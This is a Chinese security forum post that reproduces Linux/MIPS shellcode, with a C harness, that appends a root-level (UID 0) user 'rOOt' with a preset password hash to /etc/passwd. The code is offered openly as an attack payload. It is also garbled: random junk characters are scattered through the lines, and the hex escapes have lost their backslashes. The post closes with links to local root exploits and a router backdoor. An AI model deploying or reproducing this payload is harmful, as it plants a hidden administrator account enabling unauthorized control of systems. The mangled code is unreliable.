最近看过此主题的会员

返回列表 发帖
Linux/MIPS -add user(UID 0) with password
* Date:   2011-11-24( x  r! H! o+ _& C0 S: i
* Author: rigan - imrigan [at] gmail.com# l( v# K0 S/ O  y2 u0 j
* Note:
( J& D. @" ?# w$ N+ D; l1 L5 ?8 Z *         Username - rOOt- ^$ E& N+ B$ l2 `% ]8 b, p1 _* x9 B
*         Password - pwn3d- Q$ X& v' e) J" z
*/# ]" }2 I, }6 s5 E# t/ A

; Z# G2 Q! L+ U" \& e( J2 C#include <stdio.h>
8 g# ^# e9 o1 z. D5 k# G. N ) C% `' b2 L% Q% d- u/ Q1 L
char sc[] =
) m6 G% w& B5 q% r6 c        "x24x09x73x50"       //  li      t1,295203 T1 @( b# Y8 e2 F8 J9 l
        "x05x30xffxff"       //  bltzal  t1,400094 <L>( u) D8 a3 v" b  `
        "x24x09x73x50"       //  li      t1,29520 (nop)' S( i( j$ b2 _5 B$ J
     * q3 Z) V2 ?4 {  T9 r, c8 E1 J
     /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND); */
% a& D& J, p+ a, Y* B& N  A        "x3cx0fx30x2f"       //  lui     t7,0x302f
, W5 R# c5 l, h' \        "x35xefx65x74"       //  ori     t7,t7,0x6574) H! }  i; p/ y: ^8 C
        "x3cx0ex63x2f"       //  lui     t6,0x632f   
; M) s& e9 _! u& m        "x35xcex70x61"       //  ori     t6,t6,0x7061! B: D$ d' u% n+ t- s3 Z
        "x3cx0dx73x73"       //  lui     t5,0x7373
, L" h' l; D4 }' y  z: ^$ @        "x35xadx77x64"       //  ori     t5,t5,0x7764/ @7 J6 v$ I3 r3 r
        "xafxafxffxf3"       //  sw      t7,-13(sp)2 O& r: Q/ k  X# Z. g
    "xafxaexffxf7"       //  sw      t6,-9(sp)8 _6 {0 l' |# G, n6 I9 ?+ s
    "xafxadxffxfb"       //  sw      t5,-5(sp)( r( E4 ~$ K8 O2 j" x
        "xafxa0xffxff"       //  sw      zero,-1(sp)" N6 }. q, B, o7 b
    "x27xa4xffxf4"       //  addiu   a0,sp,-12
1 h, T1 P% g# l/ |( }9 v9 W5 a        "x24x05x01x6d"       //  li      a1,3651 h* T/ p+ z6 r6 Z, H: y: {, \8 U$ A2 C
        "x24x02x0fxa5"       //  li      v0,4005
$ p/ e% R) Z3 p% q        "x01x01x01x0c"       //  syscall 0x40404
" A2 e2 n9 y) y+ H5 H. f ) V) K# D& D/ A+ ?5 s  V* T
    "xafxa2xffxfc"       //  sw      v0,-4(sp)
# ^" V4 |  v( u* x% ~* Z/ M( L+ Y1 v     
6 r- U4 b8 P3 J/ s7 f, G5 }     /* write(fd, "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash& `- J$ x$ u9 o9 A6 y) e
", 45); */& R" ~1 Y. W7 Q4 n; R& o
        "x8fxa4xffxfc"       //  lw      a0,-4(sp)) {- w4 V: S- A4 d) Q
        "x23xe5x10x0c"       //  addi    a1,ra,4108
; F2 i$ P) v  ]' h, [        "x20xa5xf0x60"       //  addi    a1,a1,-4000
* g; W% ]5 E( j% i* |        "x24x09xffxd3"       //  li      t1,-457 b, n5 W* O1 C1 ^& {- q0 o
        "x01x20x30x27"       //  nor     a2,t1,zero
7 V6 P; `2 k: G8 E% [, r) p        "x24x02x0fxa4"       //  li      v0,4004( ~. A/ U* m) A$ V0 K
        "x01x01x01x0c"       //  syscall 0x40404
9 F5 J- |8 P/ ~8 t! a         + W) {' x9 o3 D8 y! k
      /* close(fd); */* u: l* g: l' f- O
        "x24x02x0fxa6"       //  li      v0,4006, N$ V9 ]6 o9 O/ F5 E
        "x01x01x01x0c"       //  syscall 0x40404" l4 t+ _, X/ D# B: v
     
2 U7 u' V3 d. P      /* exit(0);  */
* X5 b' G0 E2 F7 c. z       "x28x04xffxff"        //  slti    a0,zero,-1
$ Y6 {. L  P) G4 M; s+ E$ G5 f       "x24x02x0fxa1"        //  li      v0,4001
" C& E! N* W* i" e       "x01x01x01x0c"        //  syscall 0x40404  i2 P9 P4 `* t  ~+ L" R: G: V
      7 C( ~. }# C* x
      /*  "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash, j3 N" ~$ g6 A+ v9 j8 i
" */
, q- e' E7 f1 S( D       "x72x4fx4fx74"      
( ]+ }8 }) w7 L1 q       "x3ax58x4ax31"      
+ Y. q: y# h' x3 ^       "x47x56x2ex6e"       # y  [5 L$ {/ S" u( v& T, i
       "x79x46x46x4d"       5 N% U$ o2 S+ L; Z# x- J3 A
       "x6fx49x3ax30"      
2 Q" s7 N% Z# W; R- `+ l) A       "x3ax30x3ax72"      
% a4 Y/ T/ D7 y9 b1 H' o       "x6fx6fx74x3a"      
  B5 u! H% P8 g9 {# ?       "x2fx72x6fx6f"      % ?' d/ K0 }5 w* u% L% Q
       "x74x3ax2fx62"      
9 q: \" }8 C- m       "x69x6ex2fx62"       2 c# S- L, T2 ~6 @0 D. J
       "x61x73x68x0a";      
  K; o- B5 s# Q% K      
! V; b5 j2 R# L& jvoid main(void)
/ T9 ?* |- W' B8 v& a3 Z. L4 q" n) A{
+ \, z1 |4 H3 g! N       void(*s)(void);# q) c2 I3 g3 f& [: S
       printf("size: %d
* a1 B' J3 l8 A", strlen(sc));# h* M- r3 X' h
       s = sc;$ z$ G. W7 s) M1 n( n
       s();
; X6 X! J  |. {& z, V, a}
, r8 S5 h0 W& _" y" V6 R
, K7 j" k2 A( _8 w! v: N
$ W% L8 V# D! l0 s) A! f& n
1 V2 `- F1 _& Z! d6 x
7 n; J. Y1 ^9 {4 ?6 X) _2 N) i  v% d" U+ o
; a8 \0 V, {/ A6 }$ O' o5 ~6 U
& u, K3 m, [- o4 T! ?
- _5 z! o5 O# @/ @
6 J/ X) B+ [$ B: D1 y
( G+ s) B$ W7 S- [" s- E* M
8 \/ a  S0 b7 f9 _9 M& [7 \6 F
; o' p$ c. R6 C7 X8 j7 _4 W# _- L
  L4 D+ G5 z" x
+ }6 H; A' [9 {( j# \8 m+ P$ F

# [- f) d2 h; O. k9 K: @/ L
0 n( o& Y- U. M3 z/ i
4 g/ L/ Z* n8 A' F
, f9 x! @! _/ W6 z$ g; ~公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

Linux各版本root密码的本地破解方法

Linux本地破解系统密码

Linux 再爆 root 帐号提权漏洞

LINUX 2.6.18-238 local root exp

华为HG8245后门,远程访问

思路值得参考的一次Hackademic之Root this box

Linux Kernel 3.3.x <= 3.3.4 Buffer overflow in HFS plus filesystem

LINUX LOCAL 溢出漏洞整理专贴(禁止回复)

Linux Kernel 'perf'工具本地特权提升漏洞

Linux系统安全配置个人简要经验谈

TOP

返回列表